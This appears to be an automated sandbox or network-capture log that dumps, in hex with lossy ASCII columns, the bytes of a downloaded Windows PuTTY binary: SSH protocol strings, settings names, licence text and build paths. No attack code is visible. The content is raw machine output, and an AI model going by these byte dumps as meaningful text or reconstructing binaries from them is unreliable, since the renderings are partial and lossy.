02 00 d3 fb 03 00 00 00 02 00 92 fb 03 00 00 00 02 00 9a fb 03 00 00 00 02 00 96 fb 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 01 00
                  Data Ascii: RVbZvrz~jn
                  2023-01-13 15:04:35 UTC821INData Raw: 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 70 70 42 00 80 70 42 00 90 70 42 00 a0 70 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 70 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 77 42 00 60 77 42 00 c0 77 42 00 80 78 42 00 00 00 00 00 01 00 00 00 10 8e 42 00 d0 8f 42 00 b0 70 42 00 30 90 42 00 60 90 42 00 b0 70 42 00 70 90 42 00 d0 90 42 00 e0 90 42 00 f0 90 42 00 10 91 42 00 20 91 42 00 30 91 42 00 40 91 42 00 d0 90 42 00 00 00 00 00 00 00 00 00 75 e0 4d 00 79 e0 4d 00 75 e0 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: ppBpBpBpBpB wB`wBwBxBBBpB0B`BpBpBBBBB B0B@BBuMyMuM
                  2023-01-13 15:04:35 UTC829INData Raw: 00 0f 00 10 00 11 00 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 1b 00 1c 00 1d 00 1e 00 1f 00 20 00 21 00 2d 04 23 00 24 00 25 00 26 00 4d 04 28 00 29 00 2a 00 06 04 31 04 54 04 4e 04 2e 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 16 04 36 04 11 04 56 04 2e 04 2c 00 40 00 24 04 18 04 21 04 12 04 23 04 10 04 1f 04 20 04 28 04 1e 04 1b 04 14 04 2c 04 22 04 29 04 17 04 19 04 1a 04 2b 04 15 04 13 04 1c 04 26 04 27 04 1d 04 2f 04 45 04 57 04 4a 04 5e 00 04 04 60 00 44 04 38 04 41 04 32 04 43 04 30 04 3f 04 40 04 48 04 3e 04 3b 04 34 04 4c 04 42 04 49 04 37 04 39 04 3a 04 4b 04 35 04 33 04 3c 04 46 04 47 04 3d 04 4f 04 25 04 07 04 2a 04 7e 00 7f 00 00 00 8e be 4e 00 e9 fd 00 00 00 00 00 00 00 00 00 00 fd f5 4e 00 00 00 00 00 60 00
                  Data Ascii: !-#$%&M()*1TN.01234567896V.,@$!# (,")+&'/EWJ^`D8A2C0?@H>;4LBI79:K53<FG=O%*~NN`
                  2023-01-13 15:04:35 UTC837INData Raw: 00 ef 2c 00 00 f1 2c 00 00 7f 2d 00 00 7f 2d 00 00 e0 2d 00 00 ff 2d 00 00 2a 30 00 00 2d 30 00 00 99 30 00 00 9a 30 00 00 6f a6 00 00 72 a6 00 00 74 a6 00 00 7d a6 00 00 9e a6 00 00 9f a6 00 00 f0 a6 00 00 f1 a6 00 00 02 a8 00 00 02 a8 00 00 06 a8 00 00 06 a8 00 00 0b a8 00 00 0b a8 00 00 25 a8 00 00 26 a8 00 00 2c a8 00 00 2c a8 00 00 c4 a8 00 00 c5 a8 00 00 e0 a8 00 00 f1 a8 00 00 ff a8 00 00 ff a8 00 00 26 a9 00 00 2d a9 00 00 47 a9 00 00 51 a9 00 00 80 a9 00 00 82 a9 00 00 b3 a9 00 00 b3 a9 00 00 b6 a9 00 00 b9 a9 00 00 bc a9 00 00 bd a9 00 00 e5 a9 00 00 e5 a9 00 00 29 aa 00 00 2e aa 00 00 31 aa 00 00 32 aa 00 00 35 aa 00 00 36 aa 00 00 43 aa 00 00 43 aa 00 00 4c aa 00 00 4c aa 00 00 7c aa 00 00 7c aa 00 00 b0 aa 00 00 b0 aa 00 00 b2 aa 00 00 b4 aa
                  Data Ascii: ,,----*0-000ort}%&,,&-GQ).1256CCLL||
                  2023-01-13 15:04:35 UTC845INData Raw: 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 b0 12 46 00 7d 11 46 00 b0 12 46 00 7d 11 46 00 b0 12 46 00 7d 11 46 00 a0 11 46 00 31 12 46 00 31 12 46 00 a0 11 46 00 a0 11 46 00 a0 11 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 a0 11 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 a0 11 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12 46 00 31 12
                  Data Ascii: FFFFFFFFFFFFFFFFFFFF}FF}FF}FF1F1FFFF1F1F1F1F1F1F1F1F1F1FF1F1F1F1FF1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1F1
                  2023-01-13 15:04:35 UTC852INData Raw: 07 0f 1f 04 41 a4 79 47 40 17 6e 88 5d eb 51 5f 32 d1 c0 9b d5 8f c1 bc f2 64 35 11 41 34 78 7b 25 60 9c 2a 60 a3 e8 f8 df 1b 6c 63 1f c2 b4 12 0e 9e 32 e1 02 d1 4f 66 af 15 81 d1 ca e0 95 23 6b e1 92 3e 33 62 0b 24 3b 22 b9 be ee 0e a2 b2 85 99 0d ba e6 8c 0c 72 de 28 f7 a2 2d 45 78 12 d0 fd 94 b7 95 62 08 7d 64 f0 f5 cc e7 6f a3 49 54 fa 48 7d 87 27 fd 9d c3 1e 8d 3e f3 41 63 47 0a 74 ff 2e 99 ab 6e 6f 3a 37 fd f8 f4 60 dc 12 a8 f8 dd eb a1 4c e1 1b 99 0d 6b 6e db 10 55 7b c6 37 2c 67 6d 3b d4 65 27 04 e8 d0 dc c7 0d 29 f1 a3 ff 00 cc 92 0f 39 b5 0b ed 0f 69 fb 9f 7b 66 9c 7d db ce 0b cf 91 a0 a3 5e 15 d9 88 2f 13 bb 24 ad 5b 51 bf 79 94 7b eb d6 3b 76 b3 2e 39 37 79 59 11 cc 97 e2 26 80 2d 31 2e f4 a7 ad 42 68 3b 2b 6a c6 cc 4c 75 12 1c f1 2e 78 37 42
                  Data Ascii: AyG@n]Q_2d5A4x{%`*`lc2Of#k>3b$;"r(-Exb}doITH}'>AcGt.no:7`LknU{7,gm;e')9i{f}^/$[Qy{;v.97yY&-1.Bh;+jLu.x7B
                  2023-01-13 15:04:35 UTC860INData Raw: 80 00 80 00 80 00 00 00 80 8b 80 00 00 00 00 00 00 01 00 00 80 00 00 00 00 81 80 00 80 00 00 00 80 09 80 00 00 00 00 00 80 8a 00 00 00 00 00 00 00 88 00 00 00 00 00 00 00 09 80 00 80 00 00 00 00 0a 00 00 80 00 00 00 00 8b 80 00 80 00 00 00 00 8b 00 00 00 00 00 00 80 89 80 00 00 00 00 00 80 03 80 00 00 00 00 00 80 02 80 00 00 00 00 00 80 80 00 00 00 00 00 00 80 0a 80 00 00 00 00 00 00 0a 00 00 80 00 00 00 80 81 80 00 80 00 00 00 80 80 80 00 00 00 00 00 80 01 00 00 80 00 00 00 00 08 80 00 80 00 00 00 80 e0 56 49 00 b0 38 50 00 00 57 49 00 60 49 49 00 c0 49 49 00 f0 49 49 00 00 4a 49 00 c0 4c 49 00 60 4d 49 00 00 00 00 00 00 00 00 00 b0 70 42 00 53 7b 4e 00 10 00 00 00 80 00 00 00 10 00 00 00 01 00 00 00 72 fb 4e 00 00 00 00 00 e8 87 4d 00 e0 56 49 00 b0 38
                  Data Ascii: VI8PWI`IIIIIIJILI`MIpBS{NrNMVI8
                  2023-01-13 15:04:35 UTC868INData Raw: 00 5c a4 4f 00 1d 00 00 00 a4 a1 4f 00 1c 00 00 00 a8 a2 4f 00 1d 00 00 00 60 a3 4f 00 1c 00 00 00 14 a3 4f 00 23 00 00 00 e4 a3 4f 00 1a 00 00 00 c8 a2 4f 00 20 00 00 00 80 a3 4f 00 1f 00 00 00 38 a3 4f 00 26 00 00 00 40 a4 4f 00 1a 00 00 00 14 a4 4f 00 0f 00 00 00 cc 9f 4f 00 03 00 00 00 b4 9f 4f 00 05 00 00 00 e8 a4 4f 00 0f 00 00 00 7c a4 4f 00 23 00 00 00 58 9f 4f 00 06 00 00 00 60 9f 4f 00 09 00 00 00 24 a4 4f 00 0e 00 00 00 a0 a4 4f 00 1a 00 00 00 bc a4 4f 00 1c 00 00 00 ec a2 4f 00 25 00 00 00 a0 a3 4f 00 24 00 00 00 fc a1 4f 00 25 00 00 00 7c a2 4f 00 2b 00 00 00 74 a5 4f 00 1a 00 00 00 50 a5 4f 00 20 00 00 00 d8 a1 4f 00 22 00 00 00 50 a2 4f 00 28 00 00 00 24 a2 4f 00 2a 00 00 00 1c a5 4f 00 1b 00 00 00 a0 a5 4f 00 0c 00 00 00 98 96 4f 00 11 00
                  Data Ascii: \OOO`OO#OO O8O&@OOOOO|O#XO`O$OOOO%O$O%|O+tOPO O"PO($O*OOO
                  2023-01-13 15:04:35 UTC876INData Raw: 00 bc b3 4f 00 5b 00 00 00 e0 b1 4f 00 22 00 00 00 30 b4 4f 00 64 00 00 00 a4 ac 4f 00 be 00 00 00 d4 b6 4f 00 c3 00 00 00 7c ac 4f 00 b0 00 00 00 b8 b6 4f 00 b8 00 00 00 88 b4 4f 00 cb 00 00 00 78 b4 4f 00 c7 00 00 00 2c ac 4f 00 1a 00 00 00 74 b3 4f 00 5c 00 00 00 f4 aa 4f 00 e3 00 00 00 30 b2 4f 00 c2 00 00 00 30 ae 4f 00 bd 00 00 00 18 b2 4f 00 a6 00 00 00 00 ae 4f 00 99 00 00 00 00 a8 4f 00 1b 00 00 00 6c b4 4f 00 9a 00 00 00 ac b6 4f 00 5d 00 00 00 e0 a7 4f 00 33 00 00 00 94 b7 4f 00 7a 00 00 00 d0 aa 4f 00 40 00 00 00 68 a6 4f 00 8a 00 00 00 c0 b9 4f 00 38 00 00 00 b8 af 4f 00 80 00 00 00 94 b6 4f 00 39 00 00 00 ac af 4f 00 81 00 00 00 c4 b4 4f 00 1c 00 00 00 b8 b4 4f 00 5e 00 00 00 60 b9 4f 00 6e 00 00 00 ec aa 4f 00 1d 00 00 00 e0 aa 4f 00 5f 00
                  Data Ascii: O[O"0OdOO|OOOxO,OtO\O0O0OOOOlOO]O3OzO@hOO8OO9OOO^`OnOO_
                  2023-01-13 15:04:35 UTC884INData Raw: 74 00 50 72 6f 78 79 48 6f 73 74 00 4c 6f 67 48 6f 73 74 00 48 6f 73 74 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 00 53 6f 66 74 77 61 72 65 5c 53 69 6d 6f 6e 54 61 74 68 61 6d 5c 50 75 54 54 59 5c 4a 75 6d 70 6c 69 73 74 00 48 6f 73 74 20 6b 65 79 20 6e 6f 74 20 69 6e 20 6d 61 6e 75 61 6c 6c 79 20 63 6f 6e 66 69 67 75 72 65 64 20 6c 69 73 74 00 4d 61 6b 65 44 72 61 67 4c 69 73 74 00 50 72 6f 78 79 45 78 63 6c 75 64 65 4c 69 73 74 00 52 65 6a 65 63 74 65 64 20 58 31 31 20 63 6f 6e 6e 65 63 74 20 72 65 71 75 65 73 74 00 53 74 61 72 74 69 6e 67 20 73 65 72 69 61 6c 20 62 72 65 61 6b 20 61 74 20 75 73 65 72 20 72 65 71 75 65 73 74 00 52 65 63 65 69 76 65 64 20 25 73 20 66 6f 72 20 63 68 61 6e 6e 65 6c 20 25 64 20 77 69 74 68 20 6e 6f 20 6f 75 74 73 74 61
                  Data Ascii: tProxyHostLogHostHost does not existSoftware\SimonTatham\PuTTY\JumplistHost key not in manually configured listMakeDragListProxyExcludeListRejected X11 connect requestStarting serial break at user requestReceived %s for channel %d with no outsta
                  2023-01-13 15:04:35 UTC892INData Raw: 27 73 20 6d 65 73 73 61 67 65 3a 20 25 2e 2a 73 00 52 65 6d 6f 74 65 20 64 65 62 75 67 20 6d 65 73 73 61 67 65 3a 20 25 2e 2a 73 00 25 73 20 28 70 61 72 74 69 61 6c 20 6c 69 6e 65 29 3a 20 25 2e 2a 73 00 25 30 32 78 25 73 00 30 78 25 73 2c 30 78 25 73 00 53 65 73 73 69 6f 6e 20 65 78 69 74 65 64 20 6f 6e 20 25 73 25 73 25 73 25 2e 2a 73 25 73 00 70 75 74 74 79 25 73 25 73 00 25 7a 75 20 25 73 20 25 73 25 73 25 73 00 4c 6f 63 61 6c 20 25 73 70 6f 72 74 20 25 73 20 66 6f 72 77 61 72 64 69 6e 67 20 74 6f 20 25 73 25 73 25 73 00 49 6e 69 74 69 61 6c 69 73 65 64 20 25 73 20 6f 75 74 62 6f 75 6e 64 20 4d 41 43 20 61 6c 67 6f 72 69 74 68 6d 25 73 25 73 00 49 6e 69 74 69 61 6c 69 73 65 64 20 25 73 20 69 6e 62 6f 75 6e 64 20 4d 41 43 20 61 6c 67 6f 72 69 74 68 6d
                  Data Ascii: 's message: %.*sRemote debug message: %.*s%s (partial line): %.*s%02x%s0x%s,0x%sSession exited on %s%s%s%.*s%sputty%s%s%zu %s %s%s%sLocal %sport %s forwarding to %s%s%sInitialised %s outbound MAC algorithm%s%sInitialised %s inbound MAC algorithm
                  2023-01-13 15:04:35 UTC899INData Raw: 69 61 6c 20 64 65 6c 65 67 61 74 69 6f 6e 00 73 75 70 64 75 70 2d 6c 6f 63 61 74 69 6f 6e 00 58 20 64 69 73 70 6c 61 79 20 6c 6f 63 61 74 69 6f 6e 00 53 55 50 44 55 50 4c 6f 63 61 74 69 6f 6e 00 54 65 6c 6e 65 74 20 70 72 6f 78 79 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 00 4c 6f 63 61 6c 20 70 72 6f 78 79 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 00 53 4f 43 4b 53 20 70 72 6f 78 79 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 00 48 54 54 50 20 70 72 6f 78 79 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 00 50 75 62 6c 69 63 2d 6b 65 79 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 00 53 53 48 20 73 65 72 76 65 72 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 00 57 69 6c 6c 20 65 6e 61 62 6c 65 20 25 73 20 64 65 63 6f 6d 70 72 65 73 73 69 6f 6e 20 61
                  Data Ascii: ial delegationsupdup-locationX display locationSUPDUPLocationTelnet proxy authenticationLocal proxy authenticationSOCKS proxy authenticationHTTP proxy authenticationPublic-key authenticationSSH server authenticationWill enable %s decompression a
                  2023-01-13 15:04:35 UTC907INData Raw: 20 74 69 74 6c 65 20 63 68 61 6e 67 69 6e 67 00 63 6f 6e 66 69 67 2d 70 72 6f 78 79 2d 6c 6f 67 67 69 6e 67 00 63 6f 6e 66 69 67 2d 6c 6f 67 67 69 6e 67 00 4f 70 74 69 6f 6e 73 20 73 70 65 63 69 66 69 63 20 74 6f 20 53 53 48 20 70 61 63 6b 65 74 20 6c 6f 67 67 69 6e 67 00 4f 70 74 69 6f 6e 73 20 63 6f 6e 74 72 6f 6c 6c 69 6e 67 20 73 65 73 73 69 6f 6e 20 6c 6f 67 67 69 6e 67 00 53 65 73 73 69 6f 6e 2f 4c 6f 67 67 69 6e 67 00 70 65 72 6d 69 74 2d 70 6f 72 74 2d 66 6f 72 77 61 72 64 69 6e 67 00 70 65 72 6d 69 74 2d 61 67 65 6e 74 2d 66 6f 72 77 61 72 64 69 6e 67 00 70 65 72 6d 69 74 2d 58 31 31 2d 66 6f 72 77 61 72 64 69 6e 67 00 53 53 48 20 74 6f 20 70 72 6f 78 79 20 61 6e 64 20 75 73 65 20 70 6f 72 74 20 66 6f 72 77 61 72 64 69 6e 67 00 4f 70 74 69 6f 6e
                  Data Ascii: title changingconfig-proxy-loggingconfig-loggingOptions specific to SSH packet loggingOptions controlling session loggingSession/Loggingpermit-port-forwardingpermit-agent-forwardingpermit-X11-forwardingSSH to proxy and use port forwardingOption
                  2023-01-13 15:04:35 UTC915INData Raw: 62 6f 61 72 64 00 41 75 74 6f 2d 63 6f 70 79 20 73 65 6c 65 63 74 65 64 20 74 65 78 74 20 74 6f 20 73 79 73 74 65 6d 20 63 6c 69 70 62 6f 61 72 64 00 53 79 73 74 65 6d 20 63 6c 69 70 62 6f 61 72 64 00 43 26 6f 70 79 20 41 6c 6c 20 74 6f 20 43 6c 69 70 62 6f 61 72 64 00 53 74 61 6e 64 61 72 64 00 56 61 6c 69 64 69 74 79 20 70 65 72 69 6f 64 00 50 72 6f 78 79 20 65 72 72 6f 72 3a 20 55 6e 6b 6e 6f 77 6e 20 70 72 6f 78 79 20 6d 65 74 68 6f 64 00 73 65 72 76 65 72 2d 74 6f 2d 63 6c 69 65 6e 74 20 63 6f 6d 70 72 65 73 73 69 6f 6e 20 6d 65 74 68 6f 64 00 63 6c 69 65 6e 74 2d 74 6f 2d 73 65 72 76 65 72 20 63 6f 6d 70 72 65 73 73 69 6f 6e 20 6d 65 74 68 6f 64 00 50 72 6f 78 79 4d 65 74 68 6f 64 00 4d 61 6b 65 20 64 65 66 61 75 6c 74 20 73 79 73 74 65 6d 20 61 6c
                  Data Ascii: boardAuto-copy selected text to system clipboardSystem clipboardC&opy All to ClipboardStandardValidity periodProxy error: Unknown proxy methodserver-to-client compression methodclient-to-server compression methodProxyMethodMake default system al
                  2023-01-13 15:04:35 UTC923INData Raw: 5f 4d 53 47 5f 43 48 41 4e 4e 45 4c 5f 52 45 51 55 45 53 54 00 53 53 48 32 5f 4d 53 47 5f 47 4c 4f 42 41 4c 5f 52 45 51 55 45 53 54 00 53 53 48 32 5f 4d 53 47 5f 55 53 45 52 41 55 54 48 5f 52 45 51 55 45 53 54 00 53 53 48 32 5f 4d 53 47 5f 53 45 52 56 49 43 45 5f 52 45 51 55 45 53 54 00 53 53 48 31 5f 43 4d 53 47 5f 50 4f 52 54 5f 46 4f 52 57 41 52 44 5f 52 45 51 55 45 53 54 00 53 49 47 41 42 52 54 00 53 54 41 52 54 00 45 4e 43 52 59 50 54 00 50 4c 55 47 49 4e 5f 50 52 4f 54 4f 43 4f 4c 5f 41 43 43 45 50 54 00 53 53 48 32 5f 4d 53 47 5f 53 45 52 56 49 43 45 5f 41 43 43 45 50 54 00 57 4f 4e 54 00 44 4f 4e 54 00 52 45 50 52 49 4e 54 00 51 55 49 54 00 53 53 48 32 5f 4d 53 47 5f 4b 45 58 5f 44 48 5f 47 45 58 5f 49 4e 49 54 00 53 53 48 32 5f 4d 53 47 5f 4b 45
                  Data Ascii: _MSG_CHANNEL_REQUESTSSH2_MSG_GLOBAL_REQUESTSSH2_MSG_USERAUTH_REQUESTSSH2_MSG_SERVICE_REQUESTSSH1_CMSG_PORT_FORWARD_REQUESTSIGABRTSTARTENCRYPTPLUGIN_PROTOCOL_ACCEPTSSH2_MSG_SERVICE_ACCEPTWONTDONTREPRINTQUITSSH2_MSG_KEX_DH_GEX_INITSSH2_MSG_KE
                  2023-01-13 15:04:35 UTC931INData Raw: 43 37 41 42 46 35 41 45 38 43 44 42 30 39 33 33 44 37 31 45 38 43 39 34 45 30 34 41 32 35 36 31 39 44 43 45 45 33 44 32 32 36 31 41 44 32 45 45 36 42 46 31 32 46 46 41 30 36 44 39 38 41 30 38 36 34 44 38 37 36 30 32 37 33 33 45 43 38 36 41 36 34 35 32 31 46 32 42 31 38 31 37 37 42 32 30 30 43 42 42 45 31 31 37 35 37 37 41 36 31 35 44 36 43 37 37 30 39 38 38 43 30 42 41 44 39 34 36 45 32 30 38 45 32 34 46 41 30 37 34 45 35 41 42 33 31 34 33 44 42 35 42 46 43 45 30 46 44 31 30 38 45 34 42 38 32 44 31 32 30 41 39 32 31 30 38 30 31 31 41 37 32 33 43 31 32 41 37 38 37 45 36 44 37 38 38 37 31 39 41 31 30 42 44 42 41 35 42 32 36 39 39 43 33 32 37 31 38 36 41 46 34 45 32 33 43 31 41 39 34 36 38 33 34 42 36 31 35 30 42 44 41 32 35 38 33 45 39 43 41 32 41 44 34 34
                  Data Ascii: C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44
                  2023-01-13 15:04:35 UTC938INData Raw: 30 30 30 30 30 30 30 30 30 30 30 32 36 32 61 36 00 58 74 65 72 6d 20 52 36 00 30 78 36 62 31 37 64 31 66 32 65 31 32 63 34 32 34 37 66 38 62 63 65 36 65 35 36 33 61 34 34 30 66 32 37 37 30 33 37 64 38 31 32 64 65 62 33 33 61 30 66 34 61 31 33 39 34 35 64 38 39 38 63 32 39 36 00 68 6d 61 63 2d 73 68 61 31 2d 39 36 00 30 78 30 30 63 36 38 35 38 65 30 36 62 37 30 34 30 34 65 39 63 64 39 65 33 65 63 62 36 36 32 33 39 35 62 34 34 32 39 63 36 34 38 31 33 39 30 35 33 66 62 35 32 31 66 38 32 38 61 66 36 30 36 62 34 64 33 64 62 61 61 31 34 62 35 65 37 37 65 66 65 37 35 39 32 38 66 65 31 64 63 31 32 37 61 32 66 66 61 38 64 65 33 33 34 38 62 33 63 31 38 35 36 61 34 32 39 62 66 39 37 65 37 65 33 31 63 32 65 35 62 64 36 36 00 30 78 66 66 66 66 66 66 66 66 66 66 66 66
                  Data Ascii: 00000000000262a6Xterm R60x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296hmac-sha1-960x00c6858e06b70404e9cd9e3ecb662395b4429c648139053fb521f828af606b4d3dbaa14b5e77efe75928fe1dc127a2ffa8de3348b3c1856a429bf97e7e31c2e5bd660xffffffffffff
                  2023-01-13 15:04:35 UTC946INData Raw: 67 20 61 20 63 6f 70 79 20 6f 66 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 61 6e 64 20 61 73 73 6f 63 69 61 74 65 64 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 20 66 69 6c 65 73 20 28 74 68 65 20 22 53 6f 66 74 77 61 72 65 22 29 2c 20 74 6f 20 64 65 61 6c 20 69 6e 20 74 68 65 20 53 6f 66 74 77 61 72 65 20 77 69 74 68 6f 75 74 20 72 65 73 74 72 69 63 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 69 74 68 6f 75 74 20 6c 69 6d 69 74 61 74 69 6f 6e 20 74 68 65 20 72 69 67 68 74 73 20 74 6f 20 75 73 65 2c 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 6d 65 72 67 65 2c 20 70 75 62 6c 69 73 68 2c 20 64 69 73 74 72 69 62 75 74 65 2c 20 73 75 62 6c 69 63 65 6e 73 65 2c 20 61 6e 64 2f 6f 72 20 73 65 6c 6c 20 63 6f 70 69 65 73 20 6f 66 20 74 68 65 20 53 6f 66
                  Data Ascii: g a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Sof
                  2023-01-13 15:04:35 UTC954INData Raw: 74 68 65 20 75 70 73 74 72 65 61 6d 20 50 75 54 54 59 29 00 31 20 28 49 4e 53 45 43 55 52 45 29 00 43 6f 6e 74 72 6f 6c 2d 3f 20 28 31 32 37 29 00 20 28 49 50 76 36 29 00 20 28 49 50 76 34 29 00 20 32 30 32 32 20 28 31 37 2e 32 29 00 41 74 74 65 6d 70 74 20 22 6b 65 79 62 6f 61 72 64 2d 69 6e 74 65 72 61 63 74 69 76 65 22 20 61 75 74 68 20 28 53 53 48 2d 32 29 00 49 6e 76 61 6c 69 64 20 6e 75 6d 62 65 72 20 6f 66 20 73 74 6f 70 20 62 69 74 73 20 28 6e 65 65 64 20 31 2c 20 31 2e 35 20 6f 72 20 32 29 00 41 74 74 65 6d 70 74 20 54 49 53 20 6f 72 20 43 72 79 70 74 6f 43 61 72 64 20 61 75 74 68 20 28 53 53 48 2d 31 29 00 7a 6c 69 62 20 28 52 46 43 31 39 35 30 29 00 53 4f 43 4b 53 20 70 72 6f 78 79 20 72 65 73 70 6f 6e 73 65 20 63 6f 6e 74 61 69 6e 65 64 20 72
                  Data Ascii: the upstream PuTTY)1 (INSECURE)Control-? (127) (IPv6) (IPv4) 2022 (17.2)Attempt "keyboard-interactive" auth (SSH-2)Invalid number of stop bits (need 1, 1.5 or 2)Attempt TIS or CryptoCard auth (SSH-1)zlib (RFC1950)SOCKS proxy response contained r
                  2023-01-13 15:04:35 UTC962INData Raw: 00 73 00 73 00 65 00 73 00 00 00 63 00 6f 00 75 00 6e 00 74 00 32 00 33 00 34 00 28 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 73 00 63 00 72 00 6f 00 6c 00 6c 00 62 00 61 00 63 00 6b 00 29 00 20 00 3c 00 3d 00 20 00 6e 00 65 00 77 00 73 00 61 00 76 00 65 00 6c 00 69 00 6e 00 65 00 73 00 00 00 73 00 62 00 6c 00 65 00 6e 00 20 00 3e 00 3d 00 20 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 74 00 65 00 6d 00 70 00 73 00 62 00 6c 00 69 00 6e 00 65 00 73 00 00 00 63 00 6f 00 75 00 6e 00 74 00 32 00 33 00 34 00 28 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 73 00 63 00 72 00 6f 00 6c 00 6c 00 62 00 61 00 63 00 6b 00 29 00 20 00 3e 00 3d 00 20 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 74 00 65 00 6d 00 70 00 73 00 62 00 6c 00 69 00 6e 00 65 00 73 00 00 00 69 00 6e 00 64 00 65 00
                  Data Ascii: ssescount234(term->scrollback) <= newsavelinessblen >= term->tempsblinescount234(term->scrollback) >= term->tempsblinesinde
                  2023-01-13 15:04:35 UTC970INData Raw: 00 73 00 65 00 74 00 74 00 69 00 6e 00 67 00 73 00 2e 00 63 00 00 00 2f 00 68 00 6f 00 6d 00 65 00 2f 00 73 00 69 00 6d 00 6f 00 6e 00 2f 00 6d 00 65 00 6d 00 2f 00 2e 00 62 00 75 00 69 00 6c 00 64 00 2f 00 77 00 6f 00 72 00 6b 00 64 00 69 00 72 00 73 00 2f 00 62 00 6f 00 62 00 2d 00 6a 00 6d 00 63 00 35 00 6f 00 77 00 78 00 61 00 2f 00 70 00 75 00 74 00 74 00 79 00 2f 00 63 00 72 00 79 00 70 00 74 00 6f 00 2f 00 61 00 72 00 63 00 66 00 6f 00 75 00 72 00 2e 00 63 00 00 00 2f 00 68 00 6f 00 6d 00 65 00 2f 00 73 00 69 00 6d 00 6f 00 6e 00 2f 00 6d 00 65 00 6d 00 2f 00 2e 00 62 00 75 00 69 00 6c 00 64 00 2f 00 77 00 6f 00 72 00 6b 00 64 00 69 00 72 00 73 00 2f 00 62 00 6f 00 62 00 2d 00 6a 00 6d 00 63 00 35 00 6f 00 77 00 78 00 61 00 2f 00 70 00 75 00 74 00
                  Data Ascii: settings.c/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/arcfour.c/home/simon/mem/.build/workdirs/bob-jmc5owxa/put
                  2023-01-13 15:04:35 UTC1282INData Raw: 8a 7b 55 dd 43 4f a5 a7 3f 53 4f 1e da 68 ec 67 70 77 ea 0b 34 4f 2d b6 81 1d c2 fc b5 7a 84 69 79 22 ee c2 3e c2 1a ba 6e a4 47 76 2b d2 21 ad ab 16 9e 7d 99 1a b2 5b e3 c8 09 a3 5f 8e 51 dd 26 cb 7e 15 7f 48 5c b2 51 00 04 38 e0 f5 69 b0 ea ce 7f 1c 5e 04 9c e8 93 10 b3 62 87 78 d1 a7 f8 e0 b4 47 68 f9 43 53 49 8f 05 5f f8 57 3f 2e 84 58 cf c3 45 a2 af 96 15 75 5b e1 3e 2d 35 68 ad 4f ee 0a f9 f7 a4 a2 2e 29 6a 4e 56 5b d4 9b c3 92 d6 4a b3 76 94 88 a2 fe f0 2f 4f fa f8 bb dc 54 26 61 86 9d ee 98 54 73 5e 95 19 8c fc 7e bc a3 b7 15 6b 60 c1 6e 1c 8a 89 ff 60 b1 a2 f4 36 1a ea b8 38 b2 25 38 b7 f3 23 15 b3 08 8b 2a 35 3d 0d 42 f6 de 6f 58 e2 b0 6e cc ad 99 4e 59 8b 1f 55 04 f4 26 a2 50 17 de 94 d6 98 a4 cc f6 49 0a bb 2f 6d d3 9e b1 ba 59 9c 91 30 67 9b
                  Data Ascii: {UCO?SOhgpw4O-ziy">nGv+!}[_Q&~H\Q8i^bxGhCSI_W?.XEu[>-5hO.)jNV[Jv/OT&aTs^~k`n`68%8#*5=BoXnNYU&PI/mY0g
